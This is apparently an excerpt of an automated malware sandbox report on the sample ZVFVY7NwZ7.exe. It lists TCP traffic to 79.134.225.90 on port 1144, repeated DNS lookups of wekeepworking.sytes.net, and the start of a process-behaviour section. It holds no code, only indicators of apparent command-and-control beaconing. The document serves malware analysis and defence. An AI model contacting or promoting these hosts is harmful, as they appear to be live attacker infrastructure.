Jun 9, 2021 11:11:15.298259020 CEST	1144	49727	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:15.298387051 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:15.494648933 CEST	1144	49727	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:15.533761024 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:15.874309063 CEST	1144	49727	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:15.874408960 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:16.015630007 CEST	1144	49727	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:16.066797972 CEST	1144	49727	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:16.066932917 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:16.143918037 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:16.529381990 CEST	1144	49727	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:16.529515982 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:16.744350910 CEST	1144	49727	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:16.777503014 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:16.794373035 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:17.031527996 CEST	1144	49727	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:17.031670094 CEST	49727	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:21.174595118 CEST	49732	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:21.386069059 CEST	1144	49732	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:21.386167049 CEST	49732	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:21.395950079 CEST	49732	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:21.745346069 CEST	1144	49732	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:21.753058910 CEST	1144	49732	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:21.753390074 CEST	49732	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:22.007411957 CEST	1144	49732	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:22.007770061 CEST	49732	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:22.282449961 CEST	1144	49732	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:22.282717943 CEST	49732	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:22.524074078 CEST	1144	49732	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:22.663077116 CEST	1144	49732	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:22.664555073 CEST	49732	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:22.957674980 CEST	1144	49732	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:22.957799911 CEST	49732	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:23.204447031 CEST	1144	49732	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:23.204545975 CEST	49732	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:23.434420109 CEST	1144	49732	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:23.607362032 CEST	49732	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:23.813654900 CEST	1144	49732	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:23.814256907 CEST	49732	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:23.882386923 CEST	49732	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:28.063215017 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:28.258359909 CEST	1144	49733	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:28.258492947 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:28.259042025 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:28.564979076 CEST	1144	49733	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:28.702527046 CEST	1144	49733	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:28.703239918 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:28.913487911 CEST	1144	49733	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:28.967288971 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:29.073349953 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:29.438294888 CEST	1144	49733	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:29.441004992 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:29.563530922 CEST	1144	49733	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:29.623440027 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:29.633578062 CEST	1144	49733	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:29.633724928 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:29.846659899 CEST	1144	49733	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:29.889178991 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:29.963224888 CEST	1144	49733	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:30.089966059 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:30.376362085 CEST	1144	49733	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:30.376496077 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:30.581542969 CEST	1144	49733	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:30.623641968 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:31.238986015 CEST	49733	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:35.359824896 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:35.553148031 CEST	1144	49734	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:35.553975105 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:35.554622889 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:35.832550049 CEST	1144	49734	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:35.832827091 CEST	1144	49734	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:35.841008902 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:36.071794033 CEST	1144	49734	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:36.073412895 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:36.488619089 CEST	1144	49734	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:36.488778114 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:36.613238096 CEST	1144	49734	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:36.655765057 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:36.681566954 CEST	1144	49734	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:36.684683084 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:36.886373997 CEST	1144	49734	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:36.936615944 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:36.979458094 CEST	1144	49734	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:36.979731083 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:37.167200089 CEST	1144	49734	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:37.202977896 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:37.412611961 CEST	1144	49734	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:37.467899084 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:38.202851057 CEST	49734	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:42.345482111 CEST	49735	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:42.575653076 CEST	1144	49735	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:42.576371908 CEST	49735	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:42.576920033 CEST	49735	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:42.815052986 CEST	1144	49735	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:42.889183998 CEST	1144	49735	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:42.906580925 CEST	49735	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:43.130059958 CEST	1144	49735	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:43.131141901 CEST	49735	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:43.483809948 CEST	1144	49735	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:43.486318111 CEST	49735	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:43.597902060 CEST	1144	49735	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:43.639048100 CEST	49735	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:43.684674025 CEST	1144	49735	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:43.684828043 CEST	49735	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:43.937388897 CEST	1144	49735	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:43.937812090 CEST	49735	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:44.132110119 CEST	1144	49735	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:44.132335901 CEST	49735	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:44.329566002 CEST	1144	49735	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:44.329713106 CEST	49735	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:44.683788061 CEST	1144	49735	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:45.203397036 CEST	49735	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:49.344557047 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:49.537489891 CEST	1144	49738	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:49.537658930 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:49.577258110 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:49.860099077 CEST	1144	49738	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:49.934457064 CEST	1144	49738	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:49.934767962 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:50.127649069 CEST	1144	49738	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:50.129053116 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:50.448380947 CEST	1144	49738	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:50.448482037 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:50.480123043 CEST	1144	49738	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:50.531533003 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:50.645473003 CEST	1144	49738	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:50.645632982 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:50.976176023 CEST	1144	49738	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:50.976308107 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:51.190618992 CEST	1144	49738	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:51.190754890 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:51.384676933 CEST	1144	49738	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:51.384819984 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:51.723711967 CEST	1144	49738	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:52.250724077 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:52.543025017 CEST	1144	49738	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:52.543159008 CEST	49738	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:56.337606907 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:56.549623013 CEST	1144	49742	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:56.549774885 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:56.550232887 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:56.842273951 CEST	1144	49742	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:56.910619020 CEST	1144	49742	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:56.911066055 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:57.107613087 CEST	1144	49742	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:57.110089064 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:57.475960970 CEST	1144	49742	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:57.477478981 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:57.527374029 CEST	1144	49742	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:57.578968048 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:57.670131922 CEST	1144	49742	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:57.670459986 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:57.942194939 CEST	1144	49742	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:57.942296982 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:58.170444012 CEST	1144	49742	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:58.219624996 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:58.285912991 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:58.415703058 CEST	1144	49742	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:58.469687939 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:11:58.535358906 CEST	1144	49742	79.134.225.90	192.168.2.3
Jun 9, 2021 11:11:59.235860109 CEST	49742	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:03.353203058 CEST	49743	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:03.575824976 CEST	1144	49743	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:03.576476097 CEST	49743	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:03.578126907 CEST	49743	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:03.898580074 CEST	1144	49743	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:03.947457075 CEST	1144	49743	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:03.947819948 CEST	49743	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:04.150104046 CEST	1144	49743	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:04.155129910 CEST	49743	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:04.346643925 CEST	1144	49743	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:04.346739054 CEST	49743	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:04.569565058 CEST	1144	49743	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:04.571028948 CEST	49743	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:04.766418934 CEST	1144	49743	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:04.766798973 CEST	49743	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:04.994437933 CEST	1144	49743	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:04.994534016 CEST	49743	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:05.190422058 CEST	1144	49743	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:05.220752001 CEST	49743	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:09.344490051 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:09.535888910 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:09.535968065 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:09.564033031 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:09.860352993 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:09.930172920 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:09.930531979 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:10.142482042 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:10.143691063 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:10.452922106 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:10.453001976 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:10.543185949 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:10.595704079 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:10.650659084 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:10.652637959 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:11.076139927 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:11.076369047 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:11.294465065 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:11.345717907 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:11.562261105 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:11.611413002 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:14.762782097 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:14.815205097 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:17.555953979 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:17.611869097 CEST	49744	1144	192.168.2.3	79.134.225.90
Jun 9, 2021 11:12:19.727277994 CEST	1144	49744	79.134.225.90	192.168.2.3
Jun 9, 2021 11:12:19.768316031 CEST	49744	1144	192.168.2.3	79.134.225.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2021 11:09:59.798640966 CEST	57544	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:09:59.841681957 CEST	53	57544	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:00.696053028 CEST	55984	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:00.738250971 CEST	53	55984	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:02.636845112 CEST	64185	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:02.679023027 CEST	53	64185	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:04.018332005 CEST	65110	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:04.060944080 CEST	53	65110	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:05.760938883 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:05.803541899 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:07.005382061 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:07.058686972 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:07.898572922 CEST	60831	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:07.942694902 CEST	53	60831	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:08.663770914 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:08.708650112 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:09.879193068 CEST	53195	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:09.922919989 CEST	53	53195	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:10.911045074 CEST	50141	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:10.953511000 CEST	53	50141	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:12.161542892 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:12.204097986 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:13.393558979 CEST	49563	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:13.436232090 CEST	53	49563	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:14.252420902 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:14.295061111 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:15.141309023 CEST	59349	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:15.183782101 CEST	53	59349	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:16.034389973 CEST	57084	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:16.076759100 CEST	53	57084	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:17.266504049 CEST	58823	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:17.309207916 CEST	53	58823	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:18.471018076 CEST	57568	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:18.513885975 CEST	53	57568	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:20.015757084 CEST	50540	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:20.058691025 CEST	53	50540	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:27.895591974 CEST	54366	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:27.953741074 CEST	53	54366	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:35.613775969 CEST	53034	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:35.658682108 CEST	53	53034	8.8.8.8	192.168.2.3
Jun 9, 2021 11:10:54.768878937 CEST	57762	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:10:54.812058926 CEST	53	57762	8.8.8.8	192.168.2.3
Jun 9, 2021 11:11:13.707573891 CEST	55435	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:11:13.751946926 CEST	53	55435	8.8.8.8	192.168.2.3
Jun 9, 2021 11:11:18.190442085 CEST	50713	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:11:18.234821081 CEST	53	50713	8.8.8.8	192.168.2.3
Jun 9, 2021 11:11:21.126924038 CEST	56132	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:11:21.173408031 CEST	53	56132	8.8.8.8	192.168.2.3
Jun 9, 2021 11:11:27.948843002 CEST	58987	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:11:27.993294001 CEST	53	58987	8.8.8.8	192.168.2.3
Jun 9, 2021 11:11:35.313149929 CEST	56579	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:11:35.358407021 CEST	53	56579	8.8.8.8	192.168.2.3
Jun 9, 2021 11:11:42.301753998 CEST	60633	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:11:42.344507933 CEST	53	60633	8.8.8.8	192.168.2.3
Jun 9, 2021 11:11:42.756623983 CEST	61292	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:11:42.811577082 CEST	53	61292	8.8.8.8	192.168.2.3
Jun 9, 2021 11:11:49.292023897 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:11:49.336129904 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 9, 2021 11:11:55.044512987 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:11:55.089055061 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 9, 2021 11:11:56.291692019 CEST	61946	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:11:56.336420059 CEST	53	61946	8.8.8.8	192.168.2.3
Jun 9, 2021 11:12:03.304757118 CEST	64910	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:12:03.352278948 CEST	53	64910	8.8.8.8	192.168.2.3
Jun 9, 2021 11:12:09.290930986 CEST	52123	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:12:09.334048033 CEST	53	52123	8.8.8.8	192.168.2.3
Jun 9, 2021 11:12:21.706877947 CEST	56130	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:12:21.822653055 CEST	53	56130	8.8.8.8	192.168.2.3
Jun 9, 2021 11:12:22.223583937 CEST	56338	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:12:22.274796963 CEST	53	56338	8.8.8.8	192.168.2.3
Jun 9, 2021 11:12:22.332178116 CEST	59420	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:12:22.599700928 CEST	53	59420	8.8.8.8	192.168.2.3
Jun 9, 2021 11:12:22.660870075 CEST	58784	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:12:22.712714911 CEST	53	58784	8.8.8.8	192.168.2.3
Jun 9, 2021 11:12:23.126743078 CEST	63978	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:12:23.171693087 CEST	53	63978	8.8.8.8	192.168.2.3
Jun 9, 2021 11:12:23.573980093 CEST	62938	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:12:23.693917990 CEST	53	62938	8.8.8.8	192.168.2.3
Jun 9, 2021 11:12:24.185745955 CEST	55708	53	192.168.2.3	8.8.8.8
Jun 9, 2021 11:12:24.312416077 CEST	53	55708	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 9, 2021 11:11:13.707573891 CEST	192.168.2.3	8.8.8.8	0x391c	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 11:11:21.126924038 CEST	192.168.2.3	8.8.8.8	0xe1db	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 11:11:27.948843002 CEST	192.168.2.3	8.8.8.8	0xa73c	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 11:11:35.313149929 CEST	192.168.2.3	8.8.8.8	0xef12	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 11:11:42.301753998 CEST	192.168.2.3	8.8.8.8	0x78a5	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 11:11:49.292023897 CEST	192.168.2.3	8.8.8.8	0xa26	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 11:11:56.291692019 CEST	192.168.2.3	8.8.8.8	0x6bc6	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 11:12:03.304757118 CEST	192.168.2.3	8.8.8.8	0x873c	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)
Jun 9, 2021 11:12:09.290930986 CEST	192.168.2.3	8.8.8.8	0x2439	Standard query (0)	wekeepworking.sytes.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jun 9, 2021 11:11:13.751946926 CEST	8.8.8.8	192.168.2.3	0x391c	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 11:11:21.173408031 CEST	8.8.8.8	192.168.2.3	0xe1db	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 11:11:27.993294001 CEST	8.8.8.8	192.168.2.3	0xa73c	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 11:11:35.358407021 CEST	8.8.8.8	192.168.2.3	0xef12	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 11:11:42.344507933 CEST	8.8.8.8	192.168.2.3	0x78a5	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 11:11:49.336129904 CEST	8.8.8.8	192.168.2.3	0xa26	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 11:11:56.336420059 CEST	8.8.8.8	192.168.2.3	0x6bc6	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 11:12:03.352278948 CEST	8.8.8.8	192.168.2.3	0x873c	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)
Jun 9, 2021 11:12:09.334048033 CEST	8.8.8.8	192.168.2.3	0x2439	No error (0)	wekeepworking.sytes.net	79.134.225.90	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ZVFVY7NwZ7.exe PID: 2220 Parent PID: 5828

General

Start time:	11:10:05
Start date:	09/06/2021
Path:	C:\Users\user\Desktop\ZVFVY7NwZ7.exe
Wow64 process (32bit):	true
